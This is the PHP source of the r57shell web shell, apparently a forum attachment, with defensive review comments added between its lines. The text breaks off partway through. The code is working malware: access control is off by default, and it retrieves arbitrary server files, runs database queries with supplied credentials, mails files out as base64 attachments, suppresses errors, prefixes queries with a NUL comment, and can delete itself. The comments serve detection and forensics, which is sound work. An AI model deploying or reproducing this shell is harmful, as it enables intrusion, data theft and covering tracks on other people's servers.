Dateianhang 'r5713.php'
Herunterladen 1 <?php
2 /******************************************************************************************************/
3 /*
4 /* # # # #
5 /* # # # #
6 /* # # # #
7 /* # ## #### ## #
8 /* ## ## ###### ## ##
9 /* ## ## ###### ## ##
10 /* ## ## #### ## ##
11 /* ### ############ ###
12 /* ########################
13 /* ##############
14 /* ######## ########## #######
15 /* ### ## ########## ## ###
16 /* ### ## ########## ## ###
17 /* ### # ########## # ###
18 /* ### ## ######## ## ###
19 /* ## # ###### # ##
20 /* ## # #### # ##
21 /* ## ##
22 /*
23 /*
24 /*
25 /* r57shell.php - скрипт на пхп позволяющий вам выполнять системные команды на сервере через браузер
26 /* Вы можете скачать новую версию на нашем сайте: http://rst.void.ru
27 /* Версия: 1.31
28 /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
29 /* Отдельная благодарность за помощь и идеи: blf, phoenix, virus, NorD и всем чертям из RST/GHC.
30 /* Если у Вас есть какие-либо идеи по поводу того какие функции следует добавить в скрипт то пишите
31 /* на rst@void.ru. Все предложения будут рассмотрены.
32 /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
33 /* (c)oded by 1dt.w0lf
34 /* RST/GHC http://rst.void.ru , http://ghc.ru
35 /* ANY MODIFIED REPUBLISHING IS RESTRICTED
36 /******************************************************************************************************/
37 /* ~~~ îÁÓÔÒÏÊËÉ | Options ~~~ */
38
// Review note (defensive): operator-editable settings of this web shell.
// $auth is 0 here, so the HTTP Basic check later in the file is skipped and the page
// answers any client that requests it, not only whoever placed it.
// $name/$pass hold md5 digests; the page states the shipped default for both is 'r57'.
// The digest is a fixed literal, so it is a usable search string when hunting for
// unmodified copies of this file in a web root.
39 // Language selection
40 // $language='ru' - Russian
41 // $language='eng' - English
42 $language='ru';
43
44 // Authentication
45 // $auth = 1; - authentication on
46 // $auth = 0; - authentication off
47 $auth = 0;
48
49 // Login and password for access to the script
50 // DO NOT FORGET TO CHANGE THESE BEFORE PLACING THE FILE ON A SERVER!!! (CHANGE THIS!!!)
51 // Login and password are stored as md5 digests; the default value is 'r57'
52 // Login & password crypted with md5, default is 'r57'
53 $name='ec371748dc2da624b35a4f8f685dd122'; // user login
54 $pass='ec371748dc2da624b35a4f8f685dd122'; // user password
55 /******************************************************************************************************/
// Review note (defensive): runtime setup and the optional access check. These statements
// run on every request, before any feature handler.
// Error output is switched off and most later calls carry the '@' suppression prefix,
// so PHP error output should not be relied on to reveal this script's activity; web
// server access logs and file-integrity monitoring of the web root are better sources.
56 error_reporting(0);
57 set_magic_quotes_runtime(0);
// Lift the execution time limit and turn off output buffering for this request.
58 @set_time_limit(0);
59 @ini_set('max_execution_time',0);
60 @ini_set('output_buffering',0);
// Remember whether safe_mode is on, and the version string of this script.
61 $safe_mode = @ini_get('safe_mode');
62 $version = '1.31';
// On PHP older than 4.1.0, alias the superglobals to the legacy $HTTP_*_VARS arrays.
63 if(version_compare(phpversion(), '4.1.0') == -1)
64 {
65 $_POST = &$HTTP_POST_VARS;
66 $_GET = &$HTTP_GET_VARS;
67 $_SERVER = &$HTTP_SERVER_VARS;
68 $_COOKIE = &$HTTP_COOKIE_VARS;
69 }
// When magic quotes are active, undo the automatic escaping on POST and COOKIE values
// (GET values are not touched here).
70 if (@get_magic_quotes_gpc())
71 {
72 foreach ($_POST as $k=>$v)
73 {
74 $_POST[$k] = stripslashes($v);
75 }
76 foreach ($_COOKIE as $k=>$v)
77 {
78 $_COOKIE[$k] = stripslashes($v);
79 }
80 }
81
// HTTP Basic check, evaluated only when $auth == 1. The md5 of the supplied user name
// and password must equal $name and $pass; otherwise a 401 with realm "r57shell" and a
// branded "Access Denied" body is sent and the script exits. Both strings appear in the
// response, so they can be matched in proxy or WAF logs.
82 if($auth == 1) {
83 if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
84 {
85 header('WWW-Authenticate: Basic realm="r57shell"');
86 header('HTTP/1.0 401 Unauthorized');
87 exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
88 }
89 }
// Review note (defensive): static HTML head that the handlers below emit with `echo $head`.
// It is one single-quoted string: an HTML comment, a fixed <title>, a windows-1251 charset
// declaration, a style sheet, and three JavaScript helpers (hide_div / show_div /
// change_divst) that toggle an element and store its state in a cookie named after the
// element id. Because the text is fixed, the title and the helper names are response-body
// strings that content inspection can match.
90 $head = '<!-- úÄÒÁ×ÓÔ×ÕÊ, ÷ÁÓÑ -->
91 <html>
92 <head>
93 <title>r57shell</title>
94 <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
95
96 <STYLE>
97 tr {
98 BORDER-RIGHT: #aaaaaa 1px solid;
99 BORDER-TOP: #eeeeee 1px solid;
100 BORDER-LEFT: #eeeeee 1px solid;
101 BORDER-BOTTOM: #aaaaaa 1px solid;
102 color: #000000;
103 }
104 td {
105 BORDER-RIGHT: #aaaaaa 1px solid;
106 BORDER-TOP: #eeeeee 1px solid;
107 BORDER-LEFT: #eeeeee 1px solid;
108 BORDER-BOTTOM: #aaaaaa 1px solid;
109 color: #000000;
110 }
111 .table1 {
112 BORDER: 0px;
113 BACKGROUND-COLOR: #D4D0C8;
114 color: #000000;
115 }
116 .td1 {
117 BORDER: 0px;
118 font: 7pt Verdana;
119 color: #000000;
120 }
121 .tr1 {
122 BORDER: 0px;
123 color: #000000;
124 }
125 table {
126 BORDER: #eeeeee 1px outset;
127 BACKGROUND-COLOR: #D4D0C8;
128 color: #000000;
129 }
130 input {
131 BORDER-RIGHT: #ffffff 1px solid;
132 BORDER-TOP: #999999 1px solid;
133 BORDER-LEFT: #999999 1px solid;
134 BORDER-BOTTOM: #ffffff 1px solid;
135 BACKGROUND-COLOR: #e4e0d8;
136 font: 8pt Verdana;
137 color: #000000;
138 }
139 select {
140 BORDER-RIGHT: #ffffff 1px solid;
141 BORDER-TOP: #999999 1px solid;
142 BORDER-LEFT: #999999 1px solid;
143 BORDER-BOTTOM: #ffffff 1px solid;
144 BACKGROUND-COLOR: #e4e0d8;
145 font: 8pt Verdana;
146 color: #000000;;
147 }
148 submit {
149 BORDER: buttonhighlight 2px outset;
150 BACKGROUND-COLOR: #e4e0d8;
151 width: 30%;
152 color: #000000;
153 }
154 textarea {
155 BORDER-RIGHT: #ffffff 1px solid;
156 BORDER-TOP: #999999 1px solid;
157 BORDER-LEFT: #999999 1px solid;
158 BORDER-BOTTOM: #ffffff 1px solid;
159 BACKGROUND-COLOR: #e4e0d8;
160 font: Fixedsys bold;
161 color: #000000;
162 }
163 BODY {
164 margin: 1px;
165 color: #000000;
166 background-color: #e4e0d8;
167 }
168 A:link {COLOR:red; TEXT-DECORATION: none}
169 A:visited { COLOR:red; TEXT-DECORATION: none}
170 A:active {COLOR:red; TEXT-DECORATION: none}
171 A:hover {color:blue;TEXT-DECORATION: none}
172 </STYLE>
173 <script language=\'javascript\'>
174 function hide_div(id)
175 {
176 document.getElementById(id).style.display = \'none\';
177 document.cookie=id+\'=0;\';
178 }
179 function show_div(id)
180 {
181 document.getElementById(id).style.display = \'block\';
182 document.cookie=id+\'=1;\';
183 }
184 function change_divst(id)
185 {
186 if (document.getElementById(id).style.display == \'none\')
187 show_div(id);
188 else
189 hide_div(id);
190 }
191 </script>';
// Review note: minimal in-memory ZIP archive writer. In this file it is instantiated by
// compress() for the 'zip' option, i.e. to package a file before it is sent to the client.
192 class zipfile
193 {
// Local file entries (header + name + deflate data), one string per added file.
194 var $datasec = array();
// Central-directory records, one string per added file.
195 var $ctrl_dir = array();
// End-of-central-directory signature "PK\x05\x06" followed by four zero bytes.
196 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
// Byte offset of the next local entry; stored in each central-directory record.
197 var $old_offset = 0;
// Convert a Unix timestamp (0 means "now") into the packed 32-bit DOS date/time value:
// year-1980 at bit 25, month at 21, day at 16, hours at 11, minutes at 5, seconds/2 at 0.
// Dates before 1980 are clamped to 1980-01-01 00:00:00.
198 function unix2DosTime($unixtime = 0) {
199 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
200 if ($timearray['year'] < 1980) {
201 $timearray['year'] = 1980;
202 $timearray['mon'] = 1;
203 $timearray['mday'] = 1;
204 $timearray['hours'] = 0;
205 $timearray['minutes'] = 0;
206 $timearray['seconds'] = 0;
207 }
208 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
209 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
210 }
// Add one file to the archive.
//   $data - file contents, $name - path inside the archive, $time - Unix mtime (0 = now).
// Appends a local entry to $datasec and a matching record to $ctrl_dir; returns nothing.
211 function addFile($data, $name, $time = 0)
212 {
// ZIP paths use forward slashes.
213 $name = str_replace('\\', '/', $name);
// Build the DOS timestamp as four little-endian bytes. The text '\xNN\xNN\xNN\xNN' is
// assembled from the hex digits and then passed through eval() to become raw bytes.
// The evaluated text comes only from dechex() of a timestamp, not from request data.
// NOTE(review): the indexing assumes dechex() returned 8 hex digits - confirm for small values.
214 $dtime = dechex($this->unix2DosTime($time));
215 $hexdtime = '\x' . $dtime[6] . $dtime[7]
216 . '\x' . $dtime[4] . $dtime[5]
217 . '\x' . $dtime[2] . $dtime[3]
218 . '\x' . $dtime[0] . $dtime[1];
219 eval('$hexdtime = "' . $hexdtime . '";');
// Local file header: signature "PK\x03\x04", version 0x14, flags 0, method 8 (deflate), time.
220 $fr = "\x50\x4b\x03\x04";
221 $fr .= "\x14\x00";
222 $fr .= "\x00\x00";
223 $fr .= "\x08\x00";
224 $fr .= $hexdtime;
225 $unc_len = strlen($data);
226 $crc = crc32($data);
// gzcompress() yields a zlib stream; dropping its first 2 and last 4 bytes leaves raw deflate.
227 $zdata = gzcompress($data);
228 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
229 $c_len = strlen($zdata);
// CRC-32, compressed size, uncompressed size, name length, extra-field length (0).
230 $fr .= pack('V', $crc);
231 $fr .= pack('V', $c_len);
232 $fr .= pack('V', $unc_len);
233 $fr .= pack('v', strlen($name));
234 $fr .= pack('v', 0);
235 $fr .= $name;
236 $fr .= $zdata;
237 $this -> datasec[] = $fr;
// Central-directory record: signature "PK\x01\x02" and the same metadata again,
// followed by five zero 16-bit fields, the value 32, and the offset of the local entry.
238 $cdrec = "\x50\x4b\x01\x02";
239 $cdrec .= "\x00\x00";
240 $cdrec .= "\x14\x00";
241 $cdrec .= "\x00\x00";
242 $cdrec .= "\x08\x00";
243 $cdrec .= $hexdtime;
244 $cdrec .= pack('V', $crc);
245 $cdrec .= pack('V', $c_len);
246 $cdrec .= pack('V', $unc_len);
247 $cdrec .= pack('v', strlen($name) );
248 $cdrec .= pack('v', 0 );
249 $cdrec .= pack('v', 0 );
250 $cdrec .= pack('v', 0 );
251 $cdrec .= pack('v', 0 );
252 $cdrec .= pack('V', 32 );
253 $cdrec .= pack('V', $this -> old_offset );
// Advance the offset so the next entry's record points past this one.
254 $this -> old_offset += strlen($fr);
255 $cdrec .= $name;
256 $this -> ctrl_dir[] = $cdrec;
257 }
// Return the finished archive as one string: all local entries, the central directory,
// then the end record (entry count twice, directory size, directory offset, empty comment).
258 function file()
259 {
260 $data = implode('', $this -> datasec);
261 $ctrldir = implode('', $this -> ctrl_dir);
262 return
263 $data .
264 $ctrldir .
265 $this -> eof_ctrl_dir .
266 pack('v', sizeof($this -> ctrl_dir)) .
267 pack('v', sizeof($this -> ctrl_dir)) .
268 pack('V', strlen($ctrldir)) .
269 pack('V', strlen($data)) .
270 "\x00\x00";
271 }
272 }
// Optionally compress a file that is about to be sent to the client.
//   $filename - by reference; the matching extension (.bz2 / .gz / .zip) is appended.
//   $filedump - by reference; replaced by the compressed bytes.
//   $compress - 'bzip', 'gzip' or 'zip'; any other value leaves the data untouched.
// Also sets the globals $mime_type and, for gzip only, $content_encoding.
// A method is used only if its PHP function exists; otherwise control falls through to
// the final branch, which only sets the MIME type to application/octet-stream.
// In this file the third argument is taken straight from $_POST['compress'].
273 function compress(&$filename,&$filedump,$compress)
274 {
275 global $content_encoding;
276 global $mime_type;
277 if ($compress == 'bzip' && @function_exists('bzcompress'))
278 {
279 $filename .= '.bz2';
280 $mime_type = 'application/x-bzip2';
281 $filedump = bzcompress($filedump);
282 }
283 else if ($compress == 'gzip' && @function_exists('gzencode'))
284 {
285 $filename .= '.gz';
286 $content_encoding = 'x-gzip';
287 $mime_type = 'application/x-gzip';
288 $filedump = gzencode($filedump);
289 }
290 else if ($compress == 'zip' && @function_exists('gzcompress'))
291 {
292 $filename .= '.zip';
293 $mime_type = 'application/zip';
294 $zipfile = new zipfile();
// The entry name inside the archive is the file name without the just-added '.zip'.
295 $zipfile -> addFile($filedump, substr($filename, 0, -4));
296 $filedump = $zipfile -> file();
297 }
298 else
299 {
300 $mime_type = 'application/octet-stream';
301 }
302 }
// Send one file by e-mail through PHP's mail().
//   $to, $from, $subj - recipient, sender and subject, used as given.
//   $attach           - array with keys 'type', 'name' and 'content'.
// Returns 1 if mail() reported success, 0 otherwise.
// The message body is empty: the base64-encoded content is appended after the header
// lines in the $headers argument. None of the arguments are filtered before being
// placed in the header block.
// Review note (defensive): this is a file-exfiltration path over the host's mail system.
// Mail originating from the web server account that consists of a single base64 part
// is worth alerting on, and web hosts that do not need mail() can disable it.
303 function mailattach($to,$from,$subj,$attach)
304 {
305 $headers = "From: $from\r\n";
306 $headers .= "MIME-Version: 1.0\r\n";
307 $headers .= "Content-Type: ".$attach['type'];
308 $headers .= "; name=\"".$attach['name']."\"\r\n";
309 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
310 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
311 if(@mail($to,$subj,"",$headers)) { return 1; }
312 return 0;
313 }
// Thin wrapper over four database client extensions, selected by the string in $db
// ('MySQL', 'MSSQL', 'PostgreSQL' or 'Oracle'). The caller sets the public properties
// and then calls connect(), select_db(), query(), get_result(), dump() and close().
// Review note (defensive): in this file every connection property is filled from POST
// fields, so the class lets a remote client use the web server as a database client
// with credentials of the client's choosing. Database audit logs showing logins from
// the web host with accounts the application never uses are the matching signal.
314 class my_sql
315 {
// Connection parameters; connect() fills in a default port when $port is empty.
316 var $host = 'localhost';
317 var $port = '';
318 var $user = '';
319 var $pass = '';
320 var $base = '';
321 var $db = '';
// Connection handle, last statement/result handle, and last error text.
322 var $connection;
323 var $res;
324 var $error;
// Result data filled by get_result(): rows, column names and counters.
325 var $rows;
326 var $columns;
327 var $num_rows;
328 var $num_fields;
// Lines of the text dump produced by dump().
329 var $dump;
330
// Open a connection for the backend named in $db. Returns 1 on success, 0 on failure,
// on an unknown backend, or when the backend's connect function does not exist.
// Default ports: MySQL 3306, MSSQL 1433, PostgreSQL 5432.
331 function connect()
332 {
333 switch($this->db)
334 {
335 case 'MySQL':
336 if(empty($this->port)) { $this->port = '3306'; }
337 if(!function_exists('mysql_connect')) return 0;
338 $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
339 if(is_resource($this->connection)) return 1;
340 break;
341 case 'MSSQL':
342 if(empty($this->port)) { $this->port = '1433'; }
343 if(!function_exists('mssql_connect')) return 0;
344 $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
345 if($this->connection) return 1;
346 break;
347 case 'PostgreSQL':
348 if(empty($this->port)) { $this->port = '5432'; }
// The connection string is built by plain concatenation of the properties.
349 $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
350 if(!function_exists('pg_connect')) return 0;
351 $this->connection = @pg_connect($str);
352 if(is_resource($this->connection)) return 1;
353 break;
354 case 'Oracle':
355 if(!function_exists('ocilogon')) return 0;
356 $this->connection = @ocilogon($this->user, $this->pass, $this->base);
357 if(is_resource($this->connection)) return 1;
358 break;
359 }
360 return 0;
361 }
362
// Select the database in $base. For PostgreSQL and Oracle this is a no-op that returns 1
// (connect() already passed $base for those backends). Returns 0 on failure.
363 function select_db()
364 {
365 switch($this->db)
366 {
367 case 'MySQL':
368 if(@mysql_select_db($this->base,$this->connection)) return 1;
369 break;
370 case 'MSSQL':
371 if(@mssql_select_db($this->base,$this->connection)) return 1;
372 break;
373 case 'PostgreSQL':
374 return 1;
375 break;
376 case 'Oracle':
377 return 1;
378 break;
379 }
380 return 0;
381 }
382
// Run one SQL statement. Return codes used by the callers in this file:
//   0 - failure ($error holds a message),
//   1 - MySQL: a result resource was returned; MSSQL/PostgreSQL: at least one row;
//       Oracle: executed and ocirowcount() is 0,
//   2 - MySQL/MSSQL/PostgreSQL: executed without such a result; Oracle: ocirowcount() != 0.
383 function query($query)
384 {
385 $this->res=$this->error='';
386 switch($this->db)
387 {
388 case 'MySQL':
// Every MySQL statement is prefixed with an SQL comment that contains a single NUL byte.
// NOTE(review): the purpose is not stated in the file - presumably to disturb query
// logging or filtering; confirm. For defenders, statements that start with this
// comment-with-NUL prefix are a distinctive marker in MySQL general or audit logs.
389 if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
390 {
391 $this->error = @mysql_error($this->connection);
392 return 0;
393 }
394 else if(is_resource($this->res)) { return 1; }
395 return 2;
396 break;
397 case 'MSSQL':
398 if(false===($this->res=@mssql_query($query,$this->connection)))
399 {
400 $this->error = 'Query error';
401 return 0;
402 }
403 else if(@mssql_num_rows($this->res) > 0) { return 1; }
404 return 2;
405 break;
406 case 'PostgreSQL':
407 if(false===($this->res=@pg_query($this->connection,$query)))
408 {
409 $this->error = @pg_last_error($this->connection);
410 return 0;
411 }
412 else if(@pg_num_rows($this->res) > 0) { return 1; }
413 return 2;
414 break;
415 case 'Oracle':
// Oracle needs a parse step followed by an execute step.
416 if(false===($this->res=@ociparse($this->connection,$query)))
417 {
418 $this->error = 'Query parse error';
419 }
420 else
421 {
422 if(@ociexecute($this->res))
423 {
424 if(@ocirowcount($this->res) != 0) return 2;
425 return 1;
426 }
427 $error = @ocierror();
428 $this->error=$error['message'];
429 }
430 break;
431 }
432 return 0;
433 }
// Fetch the whole result of the last query() into $rows (associative arrays), set
// $columns from the keys of the first row, and free the result. Returns 1 when at least
// one row was fetched, else 0. The fetch loops append the terminating false value to
// $rows as well, so callers iterate up to $num_rows rather than over the whole array.
434 function get_result()
435 {
436 $this->rows=array();
437 $this->columns=array();
438 $this->num_rows=$this->num_fields=0;
439 switch($this->db)
440 {
441 case 'MySQL':
442 $this->num_rows=@mysql_num_rows($this->res);
443 $this->num_fields=@mysql_num_fields($this->res);
444 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
445 @mysql_free_result($this->res);
446 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
447 break;
448 case 'MSSQL':
449 $this->num_rows=@mssql_num_rows($this->res);
450 $this->num_fields=@mssql_num_fields($this->res);
451 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
452 @mssql_free_result($this->res);
453 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
454 break;
455 case 'PostgreSQL':
456 $this->num_rows=@pg_num_rows($this->res);
457 $this->num_fields=@pg_num_fields($this->res);
458 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
459 @pg_free_result($this->res);
460 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
461 break;
462 case 'Oracle':
// Here the row count is obtained by counting the fetched rows.
463 $this->num_fields=@ocinumcols($this->res);
464 while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
465 @ocifreestatement($this->res);
466 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
467 break;
468 }
469 return 0;
470 }
// Build a text dump of one table into $dump (an array of lines): a '##' header block
// with creation time, database and table name, then one INSERT statement per row.
// Returns 1 on success, 0 on an empty table name, an unknown backend, or a failed query.
// The table name is concatenated into the SQL text as given.
// Review note (defensive): this is the bulk data-export path; the fixed header lines
// ('## MySQL dump', '## Created: ', '## Table: ') identify files written by it.
471 function dump($table)
472 {
473 if(empty($table)) return 0;
474 $this->dump=array();
475 $this->dump[0] = '##';
476 $this->dump[1] = '## --------------------------------------- ';
477 $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
478 $this->dump[3] = '## Database: '.$this->base;
479 $this->dump[4] = '## Table: '.$table;
480 $this->dump[5] = '## --------------------------------------- ';
481 switch($this->db)
482 {
483 case 'MySQL':
484 $this->dump[0] = '## MySQL dump';
// Table definition first, then every row; values are escaped with mysql_real_escape_string().
485 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
486 if(!$this->get_result()) return 0;
487 $this->dump[] = $this->rows[0]['Create Table'];
488 $this->dump[] = '## --------------------------------------- ';
489 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
490 if(!$this->get_result()) return 0;
491 for($i=0;$i<$this->num_rows;$i++)
492 {
493 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
494 $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
495 }
496 break;
497 case 'MSSQL':
498 $this->dump[0] = '## MSSQL dump';
// Rows only (no table definition); values are escaped with addslashes().
499 if($this->query('SELECT * FROM '.$table)!=1) return 0;
500 if(!$this->get_result()) return 0;
501 for($i=0;$i<$this->num_rows;$i++)
502 {
503 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
504 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
505 }
506 break;
507 case 'PostgreSQL':
508 $this->dump[0] = '## PostgreSQL dump';
// Same shape as the MSSQL branch.
509 if($this->query('SELECT * FROM '.$table)!=1) return 0;
510 if(!$this->get_result()) return 0;
511 for($i=0;$i<$this->num_rows;$i++)
512 {
513 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
514 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
515 }
516 break;
517 case 'Oracle':
// Not implemented: only a placeholder line is written.
518 $this->dump[0] = '## ORACLE dump';
519 $this->dump[] = '## under construction';
520 break;
521 default:
522 return 0;
523 break;
524 }
525 return 1;
526 }
// Close the connection for the active backend; errors are suppressed, nothing is returned.
527 function close()
528 {
529 switch($this->db)
530 {
531 case 'MySQL':
532 @mysql_close($this->connection);
533 break;
534 case 'MSSQL':
535 @mssql_close($this->connection);
536 break;
537 case 'PostgreSQL':
538 @pg_close($this->connection);
539 break;
540 case 'Oracle':
541 @oci_close($this->connection);
542 break;
543 }
544 }
// Return the backend's affected-row count for the last statement handle ($res),
// or 0 for an unknown backend.
545 function affected_rows()
546 {
547 switch($this->db)
548 {
549 case 'MySQL':
550 return @mysql_affected_rows($this->res);
551 break;
552 case 'MSSQL':
553 return @mssql_affected_rows($this->res);
554 break;
555 case 'PostgreSQL':
556 return @pg_affected_rows($this->res);
557 break;
558 case 'Oracle':
559 return @ocirowcount($this->res);
560 break;
561 default:
562 return 0;
563 break;
564 }
565 }
566 }
// Request handler: POST cmd=download_file with d_name=<path>.
// Opens the path given by the client, reads the whole file, optionally compresses it
// via compress() according to POST 'compress', and returns it as an attachment named
// after the file's basename. No restriction is placed on the path, so any file the web
// server account can read can be retrieved. On open failure err() is called (a helper
// that is not defined in this part of the file) and the command is cleared.
// Review note (defensive): POST bodies carrying cmd=download_file and d_name, answered
// with a Content-disposition attachment from a script that is not part of the
// application, are the network-side trace of this handler. Least-privilege file
// permissions for the web server account and an open_basedir restriction limit what it
// can reach.
567 if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
568 {
569 if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
570 else
571 {
// Discard anything already buffered so the response contains only the file bytes.
572 @ob_clean();
573 $filename = @basename($_POST['d_name']);
574 $filedump = @fread($file,@filesize($_POST['d_name']));
575 fclose($file);
576 $content_encoding=$mime_type='';
577 compress($filename,$filedump,$_POST['compress']);
578 if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
579 header("Content-type: ".$mime_type);
580 header("Content-disposition: attachment; filename=\"".$filename."\";");
581 echo $filedump;
582 exit();
583 }
584 }
// Request handler: GET ?phpinfo prints the full phpinfo() page plus a BACK link and stops.
// This discloses the PHP version, loaded modules, paths and environment to the client.
585 if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
// Request handler: POST cmd=db_query.
// Takes backend type, server, port, login, password and database name from POST fields,
// connects through my_sql, splits the submitted text on ';' and runs each piece longer
// than five characters, printing result sets as HTML tables. It then re-renders the
// query form with the connection fields, including the password, as hidden inputs, and
// stops. in() is a helper that is not defined in this part of the file.
// Review note (defensive): the POST field names used here (cmd=db_query, db, db_server,
// db_port, mysql_l, mysql_p, mysql_db, db_query) and the fixed default query text in the
// textarea are stable strings for request and response inspection. The database password
// travels in the request body and back in the HTML, so any credentials seen in such
// traffic should be treated as exposed and rotated.
586 if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
587 {
588 echo $head;
589 $sql = new my_sql();
590 $sql->db = $_POST['db'];
591 $sql->host = $_POST['db_server'];
592 $sql->port = $_POST['db_port'];
593 $sql->user = $_POST['mysql_l'];
594 $sql->pass = $_POST['mysql_p'];
595 $sql->base = $_POST['mysql_db'];
// Naive statement splitting: a ';' inside a string literal also splits the text.
596 $querys = @explode(';',$_POST['db_query']);
597 echo '<body bgcolor=#e4e0d8>';
598 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
599 else
600 {
601 if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
602 else
603 {
604 foreach($querys as $num=>$query)
605 {
606 if(strlen($query)>5)
607 {
608 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
// query() returns the integers 0, 1 or 2; the string case labels match them by loose comparison.
609 switch($sql->query($query))
610 {
611 case '0':
612 echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
613 break;
614 case '1':
615 if($sql->get_result())
616 {
// Column names and cell values are HTML-escaped before being joined into table rows.
617 echo "<table width=100%>";
618 foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
619 $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", $sql->columns);
620 echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
621 for($i=0;$i<$sql->num_rows;$i++)
622 {
623 foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
624 $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
625 echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
626 }
627 echo "</table>";
628 }
629 break;
630 case '2':
631 $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
632 echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
633 break;
634 }
635 }
636 }
637 }
638 }
// Re-render the form so the next query reuses the same connection settings.
639 echo "<br><form name=form method=POST>";
640 echo in('hidden','db',0,$_POST['db']);
641 echo in('hidden','db_server',0,$_POST['db_server']);
642 echo in('hidden','db_port',0,$_POST['db_port']);
643 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
644 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
645 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
646 echo in('hidden','cmd',0,'db_query');
647 echo "<div align=center>";
// The database name and the previous query text are written into the page as submitted.
648 echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
649 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
650 echo "</form>";
651 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
652 }
// Request handler: GET ?delete removes this script file from disk (errors suppressed).
// Review note (forensics): a missing file therefore does not show the host was never
// affected. Web server access logs containing a request with the 'delete' parameter to
// the script's path, and file-system timestamps or backups of the web root, are the
// places to look for evidence after the fact.
653 if(isset($_GET['delete']))
654 {
655 @unlink(__FILE__);
656 }
// Request handler: GET ?tmp deletes a fixed list of files under /tmp.
// NOTE(review): the visible lines do not show what creates these files; judging by the
// names and by the menu texts in the $lang table (port bind, back-connect, datapipe)
// they are presumably helper programs written by other features of this script - confirm.
// For incident response, the presence of any of these paths on a host is an indicator
// that those features were used; their absence proves nothing, since this handler
// removes them.
657 if(isset($_GET['tmp']))
658 {
